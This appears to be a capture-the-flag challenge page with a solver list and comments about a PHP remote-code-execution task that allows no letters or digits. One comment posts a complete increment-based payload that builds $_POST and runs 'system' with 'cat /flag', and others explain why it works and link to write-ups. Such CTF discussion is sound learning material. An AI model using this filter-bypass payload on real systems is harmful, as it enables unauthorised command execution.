评分(4)
解题动态
hulihaha 攻破了该题 2天前
dlgz 攻破了该题 3天前
windfalls 攻破了该题 3天前
11223 攻破了该题 4天前
3024769318 攻破了该题 5天前
学了就费 攻破了该题 6天前
shengood 攻破了该题 7天前
Wei Yang 攻破了该题 9天前
Sirius1906 攻破了该题 10天前
2117783710 攻破了该题 11天前
2333m 攻破了该题 11天前
111119999 攻破了该题 12天前
wdfctf 攻破了该题 14天前
树木有点绿 攻破了该题 14天前
1520622465 攻破了该题 17天前
小崔 攻破了该题 19天前
Tychema 攻破了该题 19天前
zaiden1 攻破了该题 19天前
LANDY 攻破了该题 19天前
评论
鲲中霸王 5月前
举报
code=$_=(_/_._)[_];$__=%2B%2B$_;%2B%2B$_;$__=_.$_.$__;%2B%2B$_;%2B%2B$_;$__.=%2B%2B$_;$__.=%2B%2B$_;$$__[_]($$__[__]);&_= system&__=cat /flag
lzhh530393027 5月前
举报
看懂解析了,但是再做一次也不会
jiubanyipeng 11月前
举报
脚本参考:https://www.jiubanyipeng.com/1851.html
Jiafeng 1年前
举报
我去,属于知道思路,但是不敢实践的题目;(无数子字母RCE)
小丁小丁少发神经 1年前
举报
求问为啥设计成system和cat /flag用两个参数传,为什么不可以构造出$_POST[_]然后赋值_=system(cat /flag)呢(验证一下确实不行,但是不懂为啥)
shingu 1年前
举报
我也有个疑问。我花了好几个小时去研究,但也是一知半解。目前得到的答案是:`$$_[_]` 等价于 `${$_POST['_']}`,即用 `$_POST['_']` 的值作为变量名。如果使用`_=system(cat /flag)`,PHP会尝试访问名为 `$system('cat /flag')` 的变量,这显然非法,所以行不通。
不会写代码的菜鸟 1年前
举报
这道题完全不是我能做的,有答案也看不懂
modeng 2年前
举报
以下是我的思路与总结,希望对你有所帮助https://blog.csdn.net/m_de_g/article/details/138110100?spm=1001.2014.3001.5501
Jiafeng 1年前
举报
牛逼,可以直接造出N字符,那就好搞了;
hutiaan 2年前
举报
难,为了难而难
不懂就问 2年前
举报
参考:https://blog.csdn.net/qq_36292543/article/details/136623586
不会编程的崽 2年前
举报
自增绕过,最后的payload可以在burp里进行对特殊字符的url编码